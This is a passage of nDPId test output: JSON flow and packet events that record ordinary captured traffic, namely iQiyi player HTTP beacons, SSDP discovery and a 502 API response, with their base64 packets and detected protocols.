{"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353172051&sh=&sq=&sw=&t=1q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353172051&sh=&sq=&sw=&t=1q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1467353173018,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353173018,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5BZNAADMGNKPKbA7swKhzCABQxUX+SRXJ6QOJeVAYACCXCgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjEyIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353179045,"flow_last_seen":1467353179045,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353179045,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1467353179045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353179045,"pkt":"AQBef\/\/6cBiLE+IdCABFAAChI6EAAAER3+LAqAUm7\/\/\/+uYRB2wAjbWjTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353179045,"flow_last_seen":1467353179045,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353179045,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353179045,"flow_last_seen":1467353179045,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353179045,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1467353180202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353180202,"pkt":"TF4M6gNlABxCjnAxCABFAAOlJdtAAIAGxG7AqHMIymwO7MVFAFDpA4l5\/kkWWlAYQRLiXwAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODAwNTImc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7580000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1467353180357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353180357,"pkt":"TF4M6gNlABxCjnAxCABFAAOlJglAAIAGxEDAqHMIymwO7MVGAFChhpBHZLD+y1AYQTfUEAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODAwNTImc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} -01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7580000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353180052&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7580000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353180052&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1134,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1467353180443,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353180443,"pkt":"ABxCjnAxTF4M6gNlCABFAAC501VAADMGZuDKbA7swKhzCABQxUZksP7LoYaTxFAYACF90QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjE5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180830,"flow_last_seen":1467353180830,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353180830,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1467353180830,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353180830,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClNUgAAAQRyyvAqAUy7\/\/\/+s0xB2wAkYI7TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180830,"flow_last_seen":1467353180830,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353180830,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180830,"flow_last_seen":1467353180830,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353180830,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1467353181295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1467353181295,"pkt":"TF4M6gNlKDc3Alz6CABFAAE99F1AAEAGPTfAqAUPROn9hf5oAFDPYUlYxJOK\/oAYEBX74gAAAQEICiYb7H8rI43TR0VUIC9jb21NYWdpY2FuQXBpL2NvbXBvc2l0ZS9hcHAucGhwL0dsb2JhbC9JbmRleC9pcCBIVFRQLzEuMQ0KSG9zdDogYXBpLm1hZ2ljYW5zb2Z0LmNvbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtdHcNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KVXNlci1BZ2VudDogTWFnaWNhbiAodW5rbm93biB2ZXJzaW9uKSBDRk5ldHdvcmsvNzIwLjUuNyBEYXJ3aW4vMTQuNS4wICh4ODZfNjQpDQoNCg=="} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} 00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1467353181515,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":390,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":390,"pkt_l4_len":356,"thread_ts_msec":1467353181515,"pkt":"KDc3Alz6TF4M6gNlCABFAAF4BFJAADUGOAhE6f2FwKgFDwBQ\/mjEk4r+z2FKYYAYABs0tgAAAQEICisjjrEmG+x\/SFRUUC8xLjEgNTAyIEJhZCBHYXRld2F5DQpTZXJ2ZXI6IE1TZXJ2ZXIgMS4yLjINCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDU6NDY6NDcgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbA0KQ29udGVudC1MZW5ndGg6IDE2Ng0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KDQo8aHRtbD4NCjxoZWFkPjx0aXRsZT41MDIgQmFkIEdhdGV3YXk8L3RpdGxlPjwvaGVhZD4NCjxib2R5IGJnY29sb3I9IndoaXRlIj4NCjxjZW50ZXI+PGgxPjUwMiBCYWQgR2F0ZXdheTwvaDE+PC9jZW50ZXI+DQo8aHI+PGNlbnRlcj5uZ2lueDwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg0K"} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1467353182046,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353182046,"pkt":"AQBef\/\/6cBiLE+IdCABFAAChI6IAAAER3+HAqAUm7\/\/\/+uYRB2wAjbWjTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1467353183830,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353183830,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClNUkAAAQRyyrAqAUy7\/\/\/+s0xB2wAkYI7TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1140,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1467353185047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353185047,"pkt":"AQBef\/\/6cBiLE+IdCABFAAChI6MAAAER3+DAqAUm7\/\/\/+uYRB2wAjbWjTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7580000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1467353185940,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":683,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":683,"pkt_l4_len":649,"thread_ts_msec":1467353185940,"pkt":"TF4M6gNlABxCjnAxCABFAAKdKslAAIAGwJnAqHMIymwO28VHAFCsEt6EcxJBblAYAQR7YQAAR0VUIC9jb3JlP3Q9MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZ0bT0zMCZyYT0xJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxODUmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50O